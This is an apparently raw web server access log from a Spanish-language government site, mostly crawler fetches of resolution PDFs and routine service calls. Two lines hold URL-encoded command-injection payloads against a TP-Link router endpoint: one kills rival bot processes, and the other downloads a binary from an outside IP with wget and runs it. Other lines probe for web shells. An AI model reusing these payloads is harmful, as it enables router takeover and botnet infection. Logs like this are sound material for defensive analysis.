186.102.115.106 - - [29/Jun/2024:09:13:56 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18BSuShsqvpOys2eXP+JIp1AeVP39HFbSpMoP0vrY3NYkFj+ESNCnYuf6I5bwT2rZ7siAwW+jj9+tzTDs2a65+JVZcWJU8URvJ+v+01kVq4sazseqKS3v/Z/WPzeyyUpnUaaV5RUO3DoE8AteaTxHeZ3hMDdOsLn5G3FeUG8QiQveKfFrom8anmpTHmzJEL1FI3YenxeP2HuoAhrJB0weCwMZrZuNqxB31qQYm6rU6DCOGP/bom46080eHitwCjKDlToSNGTr1qi176aXcnSj34xQwHGs5RUMuKG6b9ZUSTHSm8MRcaVRd0ijWxojd2qCrFPup4Fov4UpunVY9y5AQmVRAzuqREVKqPeEHk7ZPy2QfnmQDXLXnT4me13Cy+5QwIrVN7avQk1bDVzTxMRAFoFIsrIxG8aFEM429fz/+SO/2urhCxxUCxQb1ercyiPTntR+fxFeat/HJw2uRNCz7jj53PojPsReiqvhqeGKeeo/Qrs+0KJfTBnS5PE1tdj6QgBqu52ktZTJ6zKP5GwAWjVcYAOy8NWVWZJN1L+Om6z3OTVLlHnUEi08aRponk8SSm++pGquzoViDBPH8lDfCkJivjoZ9aTw+5G3KL1OzWtrzZzncgITKShB0KZ7px6/UkxexF7PYFDq6wVOE6IhyvQQP7yjXvllopG2uhRPRbHyXgyCSJtKmgFvFXHoi4I5GVCW3CONqJKR+8wqGjf2CgCjg5SPqO8genKHG3rXsUHKu5VBKpvP8E&u=U2FsdGVkX18PHu0OLGEu7naIij06iHTacmMl1weSwvv7TzwsQiJMNZWbJbE2oPHf&y=U2FsdGVkX19C8jskR4Vl0Wl6tvKeAoLMbGfk8NlQeGsRmVPWNH9MpT+PTYnoLmLC HTTP/1.1" 200 208
201.245.192.253 - - [29/Jun/2024:09:13:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.102.115.106 - - [29/Jun/2024:09:13:56 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19Qv74YgQqpwf+Q/2vW5h1ne94q3pfs5p6s1n1xGi4Pinan7N0WWc+B HTTP/1.1" 200 30244
201.245.192.253 - - [29/Jun/2024:09:13:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:09:14:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2872.pdf HTTP/1.1" 200 533822
66.249.66.12 - - [29/Jun/2024:09:14:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1049.pdf HTTP/1.1" 200 8164382
66.249.66.12 - - [29/Jun/2024:09:14:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3147.pdf HTTP/1.1" 200 348524
141.98.83.197 - - [29/Jun/2024:09:14:38 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
141.98.83.197 - - [29/Jun/2024:09:14:39 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [29/Jun/2024:09:14:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
157.245.12.101 - - [29/Jun/2024:09:15:02 -0500] "\x16\x03\x01" 400 226
157.245.12.101 - - [29/Jun/2024:09:15:02 -0500] "\x16\x03\x01" 400 226
157.245.12.101 - - [29/Jun/2024:09:15:02 -0500] "GET / HTTP/1.1" 200 319
157.245.12.101 - - [29/Jun/2024:09:15:03 -0500] "GET /form.html HTTP/1.1" 404 1018
157.245.12.101 - - [29/Jun/2024:09:15:03 -0500] "GET /upl.php HTTP/1.1" 404 1018
157.245.12.101 - - [29/Jun/2024:09:15:03 -0500] "\x16\x03\x01" 400 226
157.245.12.101 - - [29/Jun/2024:09:15:03 -0500] "GET /geoip/ HTTP/1.1" 404 1018
157.245.12.101 - - [29/Jun/2024:09:15:03 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
157.245.12.101 - - [29/Jun/2024:09:15:04 -0500] "GET /1.php HTTP/1.1" 404 1018
157.245.12.101 - - [29/Jun/2024:09:15:04 -0500] "GET /bundle.js HTTP/1.1" 404 1018
157.245.12.101 - - [29/Jun/2024:09:15:04 -0500] "GET /files/ HTTP/1.1" 404 1018
157.245.12.101 - - [29/Jun/2024:09:15:04 -0500] "GET /systembc/password.php HTTP/1.1" 404 1018
157.245.12.101 - - [29/Jun/2024:09:15:04 -0500] "GET /password.php HTTP/1.1" 404 1018
186.102.115.106 - - [29/Jun/2024:09:15:04 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+K2y+rVsXyWOEhOx8rEnF9NOXXbBkWwOnjmIwFAH2vtYWDsivH2E/R&y=U2FsdGVkX1/LuaI8qAMigdP7lPipmyTryIF8BcvukXPpKZ46LWYxPNsFPwk2PpTS HTTP/1.1" 200 30
157.245.12.101 - - [29/Jun/2024:09:15:04 -0500] "GET /info.php HTTP/1.1" 404 1018
186.102.115.106 - - [29/Jun/2024:09:15:05 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18Qur+sSJbJB1jEKJAanDyS6QkL2MtEb9uyTeHpSTtKSZArdC7wQoUg0NYDwBubsAQzWB3wCcgkA4a2vzEnY/VFPJyFOWr+p60=&u=U2FsdGVkX185LQxocj8W1a+2PejNGOVDdrfcvqOkNOKtL7JR90nEFsi9UqpLcUHl&y=U2FsdGVkX1/LuaI8qAMigdP7lPipmyTryIF8BcvukXPpKZ46LWYxPNsFPwk2PpTS HTTP/1.1" 200 97
186.102.115.106 - - [29/Jun/2024:09:15:05 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX194egghZh7Vq4OI2wfbtiA9vpHVsN2fB2faRtBTdds61mR9/UYdO7IrQzpsMyinKkfbwxlKP5AMJUoP060uTmder7yySDFVOdyarMBeFa5bM3WWpBW55cohgwuptdpYY3qAV7RUdXReRFVegTWOL9/h/y5uSdLfFegTISCB7NNIHJOWyc3PwbEUeidhZOz25ia3lvPZ1ohxnL9qPTum1KxL4Pea3Arq5G7i0ou5c+5l6YMKz+bvDvdxAyXuERwoSLJKHkktcEtGlfBmjl1hLzmyhtRPd8HeEbNFuX6Q/GKLZIvF6VZVVNxDaxjYGU2f5xhn+U62MBybZpddSorXQdnK/PQmZ6mDMWzZdzSyFt9jGWtH6M5d+0/tvD9Dz0g5ybWb7Vid02h7T1WwA5p2g2ach5sT6wtRbHOi/HN0Gej7QEHJBZlTY3JPDWtCLw4tkS5o09iap5NgaF9U+qLhPnMQDPkFgaILRT+46JwwXTXB4E3szejeoPicmVMGv4O8se5o2oZLcJs2SbG8YzJNynbQX7Ug5Aq5h/8fuBsWHqFDLL+/TbYvcmqx4IAvMra0ZxAI3xaO1jto3W4psnjliqD3EBpu0JswcrepC6Z4i1BBu5kg94LCoWUuAAsQrkFEc4aqlENxStX3ha6+kLhfJTufOfI5kJbQbx/gFFp+PyLEy9Xu6hCKn8g8cee03j66/Y8CkpdDWs7GNK4hyzAmlcCTU/2V2jvNQGcbfA39qHN50fVFbPN0gX1TDzdltIWRlEKTKo9sseYs/lh8ltC3V7Gh+uHGYGWO9CM5hPXiZHZr+c5IgOZ+PgXIpFixchArIjpaqLQ3q5h+/ZpHvPi6RUmsrgRzagoypMmOAkQq5V3GLR76mkrd4EJ+iMUxRgrnLWEzOFSaCHV0CrfnE6N78BB47k+Uisw5tuqHWvmHfd1yo6Gx3pIomZE6HjagbYQYZlE+VV/d9PDQ32IRFIbVBnMENxaS7ItF3JlIJKO45MfK2q/+1jo2NHASN7B0p+W+rl9qS3X3sDUrRRigeSdirrH96HyIVpfbGjbn3/Ct5p+hkbIvf6XPwJPoJRSuPMrCYMO2DWf7Zj8WKid6JHqqX4adJfUmFsf8q/XJDmFVLO7/p478GjsKktk+wEJdRqJtjY6hKgpHB+blELFVcWblRvC/HyfX1N00qYR7GjyXtunIZzg/c99q49m2xqoWG//Ym3DR6lD1z1ofsjFOfCckuAhayM8x5kTsoiQcNnycsNfqSl9cSQJEhF44/IBJ1/gGwEXT0c2rdJrqmK1vspVuSzLknZFXLZ+EWZbu2eNJjj7BYl9XKkgMKMKL1uQh+Z1CnGV70uCX2G9qhGof++50p4+S/wDJy+MLmzM6+uWIk0q/6Lq88FhPZgQ+SjqMV1pjadxqn3xyOIkJrdsleAsXT83By7AxwXnjPC18vm+s3eEoK3q2nagOtKTHmmztYBsfxW1qlHK47NpYqctjB/FVqQ19gEMiK7Vbfpj2tdp3x5pllTQ/g4gcw6EZ2WKV8RxCvkvJqQ7kw919VTYz2+CNcHhDaJkZDv+sHcD5EWbOUWSUTcgOOqGENVIcRRg2xgxBA+3goh2X4Zn5YLMHkqanRck8W3qOm0j/dag4R+KSjJgWFM9jN1kjjHni290tAgPUQPUy1krbX/QTezeFTRg8RIpVlX/RndPFJOPR6eVSji92HKSMClGCvYLaMHcGMgEBDYw5wY7oscQJcGnk1RY7pP3JxYiSx+dO02uWsM7fx0CssX94aTFbjAXX&u=U2FsdGVkX185LQxocj8W1a+2PejNGOVDdrfcvqOkNOKtL7JR90nEFsi9UqpLcUHl&y=U2FsdGVkX1/LuaI8qAMigdP7lPipmyTryIF8BcvukXPpKZ46LWYxPNsFPwk2PpTS HTTP/1.1" 200 9065
186.102.115.106 - - [29/Jun/2024:09:15:05 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/AMzMf5F+yB+ovj5eQJhwhIm6uF0yCdHEoHlMoFpbehah2aXfVqY+IVHd5GdjrkquxTZEECqtZOwlSwcrFNZdKChHeGv3aXSL8ULcb/FqKcxSjRxhv42eLpzTXEQ5EtxMe/J+4PP2Bi2LylOZthkBFgpbwQiQlUDbdf2vGqUonfRj5D1foXHkB+xU/IPOn3ty83KV6OcTf3WsQ+I4rLrw8mC8iSohWUp/DLkYi5Hp6qfSjqDIrEJ5rdYiBC1CbhX8QMwCKF6R1C3McGJaHiTilIRBVCXryO36INIASYMXvQxro7WWXnzVmL7IhTuV+dd9KsrOCQoMJBPNCPK27vnz0+arIPcMLooHH8ao3A+XB31d9kFFkTlslZCK2yx4vnA8Y0aorDHAH7bgLvMwEdjPayv5kDxSxg9ap1jb1J1zdSl5mgYD30YWCJU59f3yDHbxQbLVgNH3i28FuI5LlG50YNO+jFKVtyhvvSoKidzIQvcjkrnYJN59jaEygMJ4Wr/0Mu/9QM2DDBKDITWv7w3dZnHU7jqjWV0wu41acE2xLTmDVsbQ1bEYsWaEalvTmHCgbnsFyG9eG/ZI7EFK8IMdHBny+nBfknkGHCt83zcf+X6gOTk5rqxyrOitjnw85blUcCzR94pe+r+5hUxhYoT8bs9vgx0zHzRs0YVXFV/RjO2T4fkVmA/vOXzoc7RTiNmIkPcHkF/6rzuQbncbyVMzSKp48cIIvbkRRuEVEKTap9OXLdNqO5z1p&u=U2FsdGVkX185LQxocj8W1a+2PejNGOVDdrfcvqOkNOKtL7JR90nEFsi9UqpLcUHl&y=U2FsdGVkX1/LuaI8qAMigdP7lPipmyTryIF8BcvukXPpKZ46LWYxPNsFPwk2PpTS HTTP/1.1" 200 208
186.102.115.106 - - [29/Jun/2024:09:15:05 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+K2y+rVsXyWOEhOx8rEnF9NOXXbBkWwOnjmIwFAH2vtYWDsivH2E/R HTTP/1.1" 200 30244
66.249.66.12 - - [29/Jun/2024:09:15:13 -0500] "GET /autoliquidacion/Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Evaluaci%C3%B3n%20de%20estudios%20de%20Emisiones%20con%20miras%20a%20verificar%20el%20cumplimiento%20de%20las%20normas%20de%20emisiones/Aplicativo.html HTTP/1.1" 200 359
201.245.192.253 - - [29/Jun/2024:09:15:18 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [29/Jun/2024:09:15:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3460.pdf HTTP/1.1" 200 407978
66.249.66.11 - - [29/Jun/2024:09:15:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20551-600/00000583.tif HTTP/1.1" 200 129188
66.249.66.11 - - [29/Jun/2024:09:15:36 -0500] "GET /IsolucionSDA/FrameSetArticulo.asp?Pagina=/IsolucionSDA/bancoconocimiento/M/MatrizdeidentificacionderequisitosSIG_v11/MatrizdeidentificacionderequisitosSIG_v11.asp?IdArticulo=8554 HTTP/1.1" 200 527
66.249.66.11 - - [29/Jun/2024:09:15:45 -0500] "GET /Publicaciones/2024EE110566.pdf HTTP/1.1" 404 228
173.252.79.113 - - [29/Jun/2024:09:15:52 -0500] "GET /images/01052024%20Nota%20apertura%20senderos%20Cerros.jpeg HTTP/1.1" 200 130671
201.245.192.253 - - [29/Jun/2024:09:15:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:15:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:09:16:13 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 200 276868
66.249.66.12 - - [29/Jun/2024:09:16:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0199.pdf HTTP/1.1" 200 343343
66.249.66.11 - - [29/Jun/2024:09:16:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1297.pdf HTTP/1.1" 200 340899
66.249.66.12 - - [29/Jun/2024:09:16:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1561.pdf HTTP/1.1" 200 431500
66.249.66.11 - - [29/Jun/2024:09:16:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4437.pdf HTTP/1.1" 200 822677
66.249.66.12 - - [29/Jun/2024:09:16:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3458.pdf HTTP/1.1" 200 1641724
216.245.221.92 - - [29/Jun/2024:09:16:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:09:16:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:09:15:31 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:09:17:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35406
201.245.192.253 - - [29/Jun/2024:09:17:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34915
66.249.66.13 - - [29/Jun/2024:09:17:14 -0500] "GET /BLA/resoluciones/AUTOS%202023/2463.pdf HTTP/1.1" 304 -
66.249.66.11 - - [29/Jun/2024:09:17:14 -0500] "GET /BLA/boletinlegal/Circulares/2022/CIRCULAR%20No.%2000007%20DEL%2025%20DE%20JULIO%20DEL%202022.pdf HTTP/1.1" 200 277953
66.249.66.11 - - [29/Jun/2024:09:17:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0777.pdf HTTP/1.1" 200 352205
54.36.232.187 - - [29/Jun/2024:09:17:29 -0500] "GET /Publicaciones/2023EE12419.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:09:17:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:17:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:09:16:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
66.249.66.12 - - [29/Jun/2024:09:18:15 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%208%20del%201%20de%20Noviembre%20de%202013.pdf HTTP/1.1" 200 385156
66.249.66.11 - - [29/Jun/2024:09:18:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2481.pdf HTTP/1.1" 200 379181
40.77.167.75 - - [29/Jun/2024:09:18:49 -0500] "GET /BLA/resoluciones/AUTOS%202024/01115.pdf HTTP/1.1" 200 579780
201.245.192.253 - - [29/Jun/2024:09:18:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:09:19:18 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%204%20del%2005%20de%20junio%20de%202013.pdf HTTP/1.1" 200 130461
66.249.66.11 - - [29/Jun/2024:09:19:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4054.pdf HTTP/1.1" 200 1655778
66.249.66.13 - - [29/Jun/2024:09:19:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0535.pdf HTTP/1.1" 200 349018
201.245.192.253 - - [29/Jun/2024:09:19:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33395
66.249.66.11 - - [29/Jun/2024:09:19:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1076.pdf HTTP/1.1" 200 456075
186.102.40.186 - - [29/Jun/2024:09:19:40 -0500] "-" 408 -
186.102.40.186 - - [29/Jun/2024:09:19:42 -0500] "-" 408 -
216.244.66.195 - - [29/Jun/2024:09:19:56 -0500] "GET /BLA/resoluciones/AUTOS%202019/01879.pdf HTTP/1.1" 200 314683
201.245.192.253 - - [29/Jun/2024:09:19:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:19:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34915
201.245.192.253 - - [29/Jun/2024:09:19:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.75 - - [29/Jun/2024:09:20:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1801.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:09:20:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.13 - - [29/Jun/2024:09:20:20 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%205%20del%2013%20de%20junio%20de%202013.pdf HTTP/1.1" 200 110904
66.249.66.11 - - [29/Jun/2024:09:20:20 -0500] "GET /BLA/resoluciones/AUTOS%202024/01217.pdf HTTP/1.1" 304 -
66.249.66.11 - - [29/Jun/2024:09:20:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0038.pdf HTTP/1.1" 200 377587
66.249.66.11 - - [29/Jun/2024:09:20:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3001.pdf HTTP/1.1" 200 398962
66.249.66.11 - - [29/Jun/2024:09:20:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5089.pdf HTTP/1.1" 200 366552
216.244.66.195 - - [29/Jun/2024:09:20:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/03324.pdf HTTP/1.1" 200 447172
66.249.66.11 - - [29/Jun/2024:09:20:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4345.pdf HTTP/1.1" 200 388851
66.249.66.12 - - [29/Jun/2024:09:20:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1270.pdf HTTP/1.1" 200 343483
66.249.66.12 - - [29/Jun/2024:09:20:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1406.pdf HTTP/1.1" 200 1443167
66.249.66.12 - - [29/Jun/2024:09:20:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0348.pdf HTTP/1.1" 200 994766
66.249.66.13 - - [29/Jun/2024:09:20:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0418.pdf HTTP/1.1" 200 345539
66.249.66.11 - - [29/Jun/2024:09:20:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1444.pdf HTTP/1.1" 200 356046
201.245.192.253 - - [29/Jun/2024:09:20:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:09:21:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5214.pdf HTTP/1.1" 200 397249
66.249.66.13 - - [29/Jun/2024:09:21:03 -0500] "GET /BLA/resoluciones/AUTOS%202014/4223.pdf HTTP/1.1" 200 312740
66.249.66.11 - - [29/Jun/2024:09:21:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2755.pdf HTTP/1.1" 200 535824
167.179.104.2 - - [29/Jun/2024:09:21:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00308.pdf HTTP/1.1" 200 396538
66.249.66.12 - - [29/Jun/2024:09:21:21 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%208%20del%2021%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 963197
66.249.66.12 - - [29/Jun/2024:09:21:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4343.pdf HTTP/1.1" 200 407057
66.249.66.11 - - [29/Jun/2024:09:21:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3245.pdf HTTP/1.1" 200 358494
66.249.66.12 - - [29/Jun/2024:09:21:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3267.pdf HTTP/1.1" 200 469502
66.249.66.11 - - [29/Jun/2024:09:21:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201201-1250/20021206.tif HTTP/1.1" 200 109674
66.249.66.11 - - [29/Jun/2024:09:21:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2857.pdf HTTP/1.1" 200 382079
216.245.221.92 - - [29/Jun/2024:09:21:50 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:09:21:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [29/Jun/2024:09:21:56 -0500] "GET /BLA/boletinlegal/Circulares/2024/CIRCULAR%20No.%2000002%20DEL%2031%20DE%20ENERO%20DEL%202024.pdf HTTP/1.1" 200 382171
172.22.2.4 - - [29/Jun/2024:09:21:57 -0500] "GET /BLA/boletinlegal/Directivas/2015/Directiva%20No.%2001%20del%2014%20de%20Enero%20de%202015.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:09:21:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:09:21:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1448.pdf HTTP/1.1" 200 352039
40.77.167.75 - - [29/Jun/2024:09:22:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/5786.pdf HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:09:22:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0766.pdf HTTP/1.1" 200 428814
66.249.66.12 - - [29/Jun/2024:09:22:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0001.pdf HTTP/1.1" 200 368629
66.249.66.11 - - [29/Jun/2024:09:22:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0528.pdf HTTP/1.1" 200 382950
66.249.66.12 - - [29/Jun/2024:09:22:22 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 200 4210437
66.249.66.11 - - [29/Jun/2024:09:22:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1404.pdf HTTP/1.1" 200 547273
66.249.66.11 - - [29/Jun/2024:09:22:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/04235.pdf HTTP/1.1" 200 478712
66.249.66.14 - - [29/Jun/2024:09:22:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1284.pdf HTTP/1.1" 200 463094
66.249.66.11 - - [29/Jun/2024:09:22:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2958.pdf HTTP/1.1" 200 920107
66.249.66.15 - - [29/Jun/2024:09:22:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0587.pdf HTTP/1.1" 200 388578
66.249.66.11 - - [29/Jun/2024:09:22:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0500.pdf HTTP/1.1" 200 347302
201.245.192.253 - - [29/Jun/2024:09:22:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:09:21:21 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.13 - - [29/Jun/2024:09:23:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2451.pdf HTTP/1.1" 200 488699
66.249.66.13 - - [29/Jun/2024:09:23:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3145.pdf HTTP/1.1" 200 407831
66.249.66.11 - - [29/Jun/2024:09:23:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2423.pdf HTTP/1.1" 200 447006
66.249.66.13 - - [29/Jun/2024:09:23:24 -0500] "GET /BLA/boletinlegal/Circulares/2023/CIRCULAR%20No.%2000006%20DEL%2013%20DE%20JULIO%20DEL%202023.pdf HTTP/1.1" 200 375301
66.249.66.11 - - [29/Jun/2024:09:23:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2760.pdf HTTP/1.1" 200 315085
66.249.66.11 - - [29/Jun/2024:09:23:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5124.pdf HTTP/1.1" 200 604380
66.249.66.11 - - [29/Jun/2024:09:23:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2339.pdf HTTP/1.1" 200 346866
172.22.2.4 - - [29/Jun/2024:09:22:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.12 - - [29/Jun/2024:09:23:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1990.pdf HTTP/1.1" 200 481162
201.245.192.253 - - [29/Jun/2024:09:23:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:09:23:58 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:09:24:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2150.pdf HTTP/1.1" 200 2037018
66.249.66.12 - - [29/Jun/2024:09:24:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5147.pdf HTTP/1.1" 200 450017
66.249.66.11 - - [29/Jun/2024:09:24:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3851.pdf HTTP/1.1" 200 765842
66.249.66.12 - - [29/Jun/2024:09:24:26 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 158030
66.249.66.11 - - [29/Jun/2024:09:24:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4889.pdf HTTP/1.1" 200 490548
66.249.66.12 - - [29/Jun/2024:09:24:31 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2005%20del%2013%20de%20Junio%20de%202017.pdf HTTP/1.1" 200 853105
66.249.66.12 - - [29/Jun/2024:09:24:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1558.pdf HTTP/1.1" 200 413448
172.22.2.4 - - [29/Jun/2024:09:24:33 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [29/Jun/2024:09:24:33 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [29/Jun/2024:09:24:33 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
